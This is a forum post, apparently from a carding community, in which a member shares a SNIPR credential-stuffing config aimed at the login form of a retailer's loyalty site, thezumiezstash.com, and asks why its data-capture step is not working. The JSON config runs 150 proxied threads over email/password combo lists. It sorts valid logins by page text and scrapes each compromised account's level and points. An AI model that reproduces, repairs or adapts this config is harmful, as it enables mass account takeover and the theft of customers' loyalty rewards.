Be A Boss - School a noob - Help the team.

Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
✨ CONTACT ADMIN FOR ADVERTISEMENT ✨
📧 EMAIL: crdpro7@gmail.com
banner expire at 13 August 2024
Wizard's shop 2.0

suffocate

Member
Joined
Apr 7, 2018
Messages
392
Could anyone give me a hint as to why capture is not working for this config I made?  The one pushed out from snipr server does not have capture and is not as fast.
Any tips appreciated.
Thanks!


[hide]
{
  "General": {
    "proxyType": "Proxies",
    "comboType": "Email/Username",
    "threads": "150",
    "name": "Zcash2"
  },
  "Requests": [
    {
      "successKeys": [
        "Community"
      ],
      "actionUrl": "https://thezumiezstash.com/login",
      "method": "GET",
      "userAgent": "Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36 OPR\\/49.0.2725.47",
      "contentType": "application/x-www-form-urlencoded",
      "accept": "*/*",
      "referer": "https://thezumiezstash.com/login",
      "cookies": "__cfduid=d372399219c8c516f1d99e506db39a11a1522119692",
      "postData": "username_login=<USER>&password_login=<PASS>&op=Login&form_build_id=form-+id+&form_id=crowdtwist_login_form",
      "headers": [
        {
          "name": "X-Content-Type-Options:",
          "value": "nosniff"
        },
        {
          "name": "X-Generator: Drupal 8 (https://www.drupal.org)",
          "value": "Drupal 8 (https://www.drupal.org)"
        }
      ],
      "failureKeys": [
        "The login information was incorrect. Please try again."
      ],
      "variables": [
        {
          "type": "Regex",
          "name": "id",
          "usedFor": "postData"
        }
      ]
    },
    {
      "method": "POST",
      "actionUrl": "https://thezumiezstash.com/login",
      "userAgent": "Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36 OPR\\/49.0.2725.47",
      "contentType": "application/x-www-form-urlencoded",
      "accept": "*/*",
      "referer": "https://thezumiezstash.com/login",
      "cookies": "__cfduid=d372399219c8c516f1d99e506db39a11a1522119692",
      "postData": "username_login=<USER>&password_login=<PASS>&op=Login&form_build_id=form-+id+&form_id=crowdtwist_login_form",
      "successKeys": [
        "Community"
      ],
      "failureKeys": [
        "The login information was incorrect. Please try again."
      ],
      "headers": [
        {
          "name": "X-Content-Type-Options:",
          "value": "nosniff"
        },
        {
          "name": "X-Generator: Drupal 8 (https://www.drupal.org)",
          "value": "Drupal 8 (https://www.drupal.org)"
        }
      ],
      "captureParse": {
        "patterns": [
          {
            "pattern": "Your Level: <span>([^<]*)",
            "returnString": "Level: +1+"
          },
          {
            "pattern": "<div class='num orange'>([^<]*)",
            "returnString": "Points: +1+"
          }
        ]
      }
    }
  ]
}

[/hide]
 
suffocate said:
Could anyone give me a hint as to why capture is not working for this config I made?  The one pushed out from snipr server does not have capture and is not as fast.
Any tips appreciated.
Thanks!
 
Back
Top